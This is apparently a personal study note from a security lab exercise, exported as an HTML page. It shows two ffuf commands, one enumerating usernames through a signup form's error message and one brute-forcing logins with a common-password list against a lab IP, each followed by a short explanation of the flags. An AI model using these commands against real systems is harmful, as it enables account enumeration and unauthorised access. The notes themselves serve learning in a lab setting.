<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Username enum</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Username enum</h1>

      <div class="ck-content"><pre><code class="language-text-plain">ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&amp;email=x&amp;password=x&amp;cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.189/customers/signup -mr "username already exists"</code></pre>

        <p>-w specifies wordlist , -X specifies request method, -d tells the data
          to be send(params found from page source)</p>
        <p>-H specifies a header (we are submitting form data in above code), -u
          is url and -mr <code>Match regexp</code>

        </p><pre><code class="language-text-plain">ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&amp;password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.189/customers/login -fc 200</code></pre>

        <p>This ffuf command is a little different to the previous one in Task 2.
          Previously we used the <strong>FUZZ</strong> keyword to select where in the
          request the data from the wordlists would be inserted, but because we're
          using multiple wordlists, we have to specify our own FUZZ keyword. In this
          instance, we've chosen <code>W1</code> for our list of valid usernames and <code>W2</code> for
          the list of passwords we will try. The multiple wordlists are again specified
          with the <code>-w</code> argument but separated with a comma.  For a positive
          match, we're using the <code>-fc</code> argument to check for an HTTP status
          code other than 200.</p>
      </div>
    </div>
  </body>

</html>